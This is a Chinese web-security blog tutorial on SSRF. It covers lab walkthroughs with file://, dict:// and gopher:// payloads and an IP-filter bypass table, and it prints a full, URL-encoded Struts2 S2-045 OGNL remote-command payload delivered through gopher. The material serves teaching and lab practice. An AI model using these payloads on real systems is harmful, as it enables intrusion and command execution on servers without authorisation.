Web安全之SSRF漏洞

最新推荐文章于 2024-06-22 12:53:35 发布

BynnSecurity

最新推荐文章于 2024-06-22 12:53:35 发布

阅读量405

点赞数

分类专栏： Web安全入门篇文章标签： web安全安全

本文链接：https://blog.csdn.net/qq_42751192/article/details/133004760

版权

Web安全入门篇专栏收录该内容

9 篇文章 3 订阅

订阅专栏

一、漏洞简介

1.1、SSRF漏洞简介

SSRF 漏洞简介

SSRF (Server-Side Request Forgery) 即服务器端请求伪造，是一种由攻击者构造，由服务端发起请求的一个网络攻击，一般用来在外网探测或攻击内网服务，其影响效果根据服务器用的函数不同，从而造成不同的影响。

SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容，加载指定地址的图片，下载等等。

1.2、SSRF的危害与分类

SSRF的利用大致范围（危害）

内外网的端口和服务扫描
主机本地敏感数据的读取
内外网主机应用程序漏洞的利用
内外网 Web 站点漏洞的利用
等等······

如何 SSRF 漏洞的寻找（漏洞常出现的位置）

分享：通过 URL 地址分享网页内容
转码服务
在线翻译
图片加载与下载：通过 URL 地址加载或下载图片
图片、文章收藏功能
未公开的 api 实现以及其他调用 URL 的功能
从 URL 关键字中寻找（share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain）

PHP 与 SSRF 相关函数

file_get_contents()：将整个文件或一个 url 所指向的文件读入一个字符串中。

readfile()：输出一个文件的内容。

fsockopen()：打开一个网络连接或者一个Unix 套接字连接。

curl_init()：初始化一个新的会话，返回一个 cURL 句柄，供 cur_lsetopt()，curl_exec() 和 curl_close() 函数使用。

fopen()：打开一个文件文件或者 URL。

上述函数函数使用不当会造成 SSRF 漏洞。此外，PHP 原生类 SoapClient 在触发反序列化时可导致 SSRF。

SSRF分类

有回显 SSRF
无回显 SSRF

1.3、SSRF相关利用协议

协议	描述
http://	探测内网主机存活、端口扫描、访问内网未授权文件
https://	探测内网主机存活、端口扫描、访问内网未授权文件
file://	在有回显的情况下，利用 file 协议可以读取任意文件的内容
dict://	泄露安装软件版本信息，查看端口，操作内网 redis 服务等
gopher://	gopher 支持发出 GET、POST 请求。可以先截获 get 请求包和 post 请求包，再构造成符合 gopher 协议的请求。gopher 协议是 ssrf 利用中一个最强大的协议(俗称万能协议)。可用于反弹 shell

1.4、SSRF绕过IP限制

IP	说明
localhost
127.0.0.1
127.0000000000000.001
127.1	这种方式为省略写法，如10.1.1.3，写成10.3
127。0。0。1	利用句号绕过
0.0.0.0
0
ctf.@127.0.0.1/flag.php?show	相当于访问了127.0.0.1/flag.php
0x7F000001	十六进制的127.0.0.1
0xC0A80001	十六进制整数格式
0xC0.0xA8.0.1	十六进制格式
3232235521	八进制整数格式
0300.0250.0.1	8进制格式
短网址绕过	短网址绕过
一些公网https域名，但是解析到127.0.0.1	一些公网https域名，但是解析到127.0.0.1

二、环境下载

环境下载地址

SSRF-Lab ：https://github.com/m6a-UdS/ssrf-lab

Pikachu ：https://github.com/zhuifengshaonianhanlu/pikachu

三、漏洞利用

3.1、http(s)协议利用

环境描述

任务描述：目标访问 11.1.1.2 的 HTTP 服务获取 flag。

攻击机：192.168.2.9

靶机：192.168.2.43（公网）、11.1.1.2（内网）

漏洞实践

直接访问 11.1.1.2 的 HTTP 访问。

肯定是访问不了的拉，因为这个是服务器的内网环境，所以我们就需要利用 SSRF 漏洞了。

访问漏洞环境 192.168.2.43:8000。

在输入框中输入 http://11.1.1.2 进行访问。

发现有个 flag.txt 文件，尝试访问 flag.txt 文件。

点击 TEST IT! 提交后成功访问目标内网的 http://11.1.1.2 下的 flag.txt 文件。

3.2、file协议利用

环境描述

靶机：192.168.2.9

任务描述：读取 C:\Windows\win.ini 文件内容

漏洞实践

访问漏洞环境 SSRF -> SSRF(file-get-content)。

点击 "反正都读了,那就在来一首吧" 这个超链接。

点击超链接后发现 file 后跟着个 url 并以 http 协议去访问本地的 info2.php 文件，这个跟我们上一小节讲的是一样的，但我们这小结是需要 file 协议去读取其他路径下的文件而不是去访问目标内网环境。

利用 file 协议读取 win.ini 文件。

?file=file:///C:\Windows\win.ini

3.3、dict协议利用

环境描述

靶机：192.168.2.9

任务描述：利用 dict 协议获取内网主机开放端口相应服务的指纹信息。

漏洞实践

访问漏洞环境 SSRF -> SSRF(curl)。

点击 "累了吧,来读一首诗吧" 超链接。

讲 url 中的 http 协议修改为 dict 协议，这里获取 80 端口的信息。

?url=dict://127.0.0.1:80

成功获取到 80 端口的指纹信息，能获取到就说明端口是开放的。

这里我本地安装了个 Nessus 端口为 8834 尝试获取这个端口的指纹信息。

?url=dict://127.0.0.1:8834

3.4、gopher协议攻击struts2

环境描述

攻击机：192.168.2.9

靶机：192.168.2.13 端口说明：80（存在ssrf漏洞）、8080（存在s2-045漏洞）

任务描述：利用 dict 协议获取内网主机开放端口相应服务的指纹信息。

漏洞实践

访问漏洞环境 SSRF -> SSRF(curl)。

在环境描述中的端口描述存在 s2-045 漏洞，那么构造 POC 如下：

GET /showcase.action HTTP/1.1
Host: 192.168.2.43:8080
Content-Type:%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

接着对 POC 进行 URL 编码。

注：每个回车都编码成 %0d%0a，包括尾行的回车

gopher://192.168.2.43:8080/_GET%20/showcase.action%20HTTP/1.1%0d%0aHost:%20192.168.123.155:8080%0d%0aContent-Type:%25%7b%28%23%5f%3d%27%6d%75%6c%74%69%70%61%72%74%2f%66%6f%72%6d%2d%64%61%74%61%27%29%2e%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%63%6d%64%3d%27%69%64%27%29%2e%28%23%69%73%77%69%6e%3d%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%53%79%73%74%65%6d%40%67%65%74%50%72%6f%70%65%72%74%79%28%27%6f%73%2e%6e%61%6d%65%27%29%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%63%6f%6e%74%61%69%6e%73%28%27%77%69%6e%27%29%29%29%2e%28%23%63%6d%64%73%3d%28%23%69%73%77%69%6e%3f%7b%27%63%6d%64%2e%65%78%65%27%2c%27%2f%63%27%2c%23%63%6d%64%7d%3a%7b%27%2f%62%69%6e%2f%62%61%73%68%27%2c%27%2d%63%27%2c%23%63%6d%64%7d%29%29%2e%28%23%70%3d%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%23%63%6d%64%73%29%29%2e%28%23%70%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%29%2e%28%23%70%72%6f%63%65%73%73%3d%23%70%2e%73%74%61%72%74%28%29%29%2e%28%23%72%6f%73%3d%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%63%6f%70%79%28%23%70%72%6f%63%65%73%73%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%72%6f%73%29%29%2e%28%23%72%6f%73%2e%66%6c%75%73%68%28%29%29%7d%0d%0a

使用 curl 进行访问。

成功执行 id 命令，那么在 url 中利用需要将 POC 再次进行 URL 编码，POC如下：

gopher%3A%2F%2F192.168.2.43%3A8080%2F_GET%2520%2Fshowcase.action%2520HTTP%2F1.1%250d%250aHost%3A%2520192.168.123.155%3A8080%250d%250aContent-Type%3A%2525%257b%2528%2523%255f%253d%2527%256d%2575%256c%2574%2569%2570%2561%2572%2574%252f%2566%256f%2572%256d%252d%2564%2561%2574%2561%2527%2529%252e%2528%2523%2564%256d%253d%2540%256f%2567%256e%256c%252e%254f%2567%256e%256c%2543%256f%256e%2574%2565%2578%2574%2540%2544%2545%2546%2541%2555%254c%2554%255f%254d%2545%254d%2542%2545%2552%255f%2541%2543%2543%2545%2553%2553%2529%252e%2528%2523%255f%256d%2565%256d%2562%2565%2572%2541%2563%2563%2565%2573%2573%253f%2528%2523%255f%256d%2565%256d%2562%2565%2572%2541%2563%2563%2565%2573%2573%253d%2523%2564%256d%2529%253a%2528%2528%2523%2563%256f%256e%2574%2561%2569%256e%2565%2572%253d%2523%2563%256f%256e%2574%2565%2578%2574%255b%2527%2563%256f%256d%252e%256f%2570%2565%256e%2573%2579%256d%2570%2568%256f%256e%2579%252e%2578%2577%256f%2572%256b%2532%252e%2541%2563%2574%2569%256f%256e%2543%256f%256e%2574%2565%2578%2574%252e%2563%256f%256e%2574%2561%2569%256e%2565%2572%2527%255d%2529%252e%2528%2523%256f%2567%256e%256c%2555%2574%2569%256c%253d%2523%2563%256f%256e%2574%2561%2569%256e%2565%2572%252e%2567%2565%2574%2549%256e%2573%2574%2561%256e%2563%2565%2528%2540%2563%256f%256d%252e%256f%2570%2565%256e%2573%2579%256d%2570%2568%256f%256e%2579%252e%2578%2577%256f%2572%256b%2532%252e%256f%2567%256e%256c%252e%254f%2567%256e%256c%2555%2574%2569%256c%2540%2563%256c%2561%2573%2573%2529%2529%252e%2528%2523%256f%2567%256e%256c%2555%2574%2569%256c%252e%2567%2565%2574%2545%2578%2563%256c%2575%2564%2565%2564%2550%2561%2563%256b%2561%2567%2565%254e%2561%256d%2565%2573%2528%2529%252e%2563%256c%2565%2561%2572%2528%2529%2529%252e%2528%2523%256f%2567%256e%256c%2555%2574%2569%256c%252e%2567%2565%2574%2545%2578%2563%256c%2575%2564%2565%2564%2543%256c%2561%2573%2573%2565%2573%2528%2529%252e%2563%256c%2565%2561%2572%2528%2529%2529%252e%2528%2523%2563%256f%256e%2574%2565%2578%2574%252e%2573%2565%2574%254d%2565%256d%2562%2565%2572%2541%2563%2563%2565%2573%2573%2528%2523%2564%256d%2529%2529%2529%2529%252e%2528%2523%2563%256d%2564%253d%2527%2569%2564%2527%2529%252e%2528%2523%2569%2573%2577%2569%256e%253d%2528%2540%256a%2561%2576%2561%252e%256c%2561%256e%2567%252e%2553%2579%2573%2574%2565%256d%2540%2567%2565%2574%2550%2572%256f%2570%2565%2572%2574%2579%2528%2527%256f%2573%252e%256e%2561%256d%2565%2527%2529%252e%2574%256f%254c%256f%2577%2565%2572%2543%2561%2573%2565%2528%2529%252e%2563%256f%256e%2574%2561%2569%256e%2573%2528%2527%2577%2569%256e%2527%2529%2529%2529%252e%2528%2523%2563%256d%2564%2573%253d%2528%2523%2569%2573%2577%2569%256e%253f%257b%2527%2563%256d%2564%252e%2565%2578%2565%2527%252c%2527%252f%2563%2527%252c%2523%2563%256d%2564%257d%253a%257b%2527%252f%2562%2569%256e%252f%2562%2561%2573%2568%2527%252c%2527%252d%2563%2527%252c%2523%2563%256d%2564%257d%2529%2529%252e%2528%2523%2570%253d%256e%2565%2577%2520%256a%2561%2576%2561%252e%256c%2561%256e%2567%252e%2550%2572%256f%2563%2565%2573%2573%2542%2575%2569%256c%2564%2565%2572%2528%2523%2563%256d%2564%2573%2529%2529%252e%2528%2523%2570%252e%2572%2565%2564%2569%2572%2565%2563%2574%2545%2572%2572%256f%2572%2553%2574%2572%2565%2561%256d%2528%2574%2572%2575%2565%2529%2529%252e%2528%2523%2570%2572%256f%2563%2565%2573%2573%253d%2523%2570%252e%2573%2574%2561%2572%2574%2528%2529%2529%252e%2528%2523%2572%256f%2573%253d%2528%2540%256f%2572%2567%252e%2561%2570%2561%2563%2568%2565%252e%2573%2574%2572%2575%2574%2573%2532%252e%2553%2565%2572%2576%256c%2565%2574%2541%2563%2574%2569%256f%256e%2543%256f%256e%2574%2565%2578%2574%2540%2567%2565%2574%2552%2565%2573%2570%256f%256e%2573%2565%2528%2529%252e%2567%2565%2574%254f%2575%2574%2570%2575%2574%2553%2574%2572%2565%2561%256d%2528%2529%2529%2529%252e%2528%2540%256f%2572%2567%252e%2561%2570%2561%2563%2568%2565%252e%2563%256f%256d%256d%256f%256e%2573%252e%2569%256f%252e%2549%254f%2555%2574%2569%256c%2573%2540%2563%256f%2570%2579%2528%2523%2570%2572%256f%2563%2565%2573%2573%252e%2567%2565%2574%2549%256e%2570%2575%2574%2553%2574%2572%2565%2561%256d%2528%2529%252c%2523%2572%256f%2573%2529%2529%252e%2528%2523%2572%256f%2573%252e%2566%256c%2575%2573%2568%2528%2529%2529%257d%250d%250a

将 poc 传递给 url 值就可以执行命令了。

3.5、无回显SSRF

通常如果没有回显我们就无法判断是否存在 SSRF 漏洞了，所以我们可以利用 DNSLog 来查看是否存在 SSRF 漏洞。

DNSLog 网址：http://dnslog.cn/

访问 DNSLog，点击 Get SubDomain 获取一个域名。

访问漏洞页面 SSRF -> ssrc(curl)。

点击 "累了吧,来读一首诗吧" 超链接，然后使用 http 协议访问刚刚 DNSLog 中获取的域名。

回到 DNSLog 即可看到有回显了就说明存在 SSRF 漏洞。

BynnSecurity

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
Web安全之SSRF漏洞

SSRF (Server-Side Request Forgery) 即服务器端请求伪造，是一种由攻击者构造，由服务端发起请求的一个网络攻击，一般用来在外网探测或攻击内网服务，其影响效果根据服务器用的函数不同，从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容，加载指定地址的图片，下载等等。
复制链接

扫一扫

专栏目录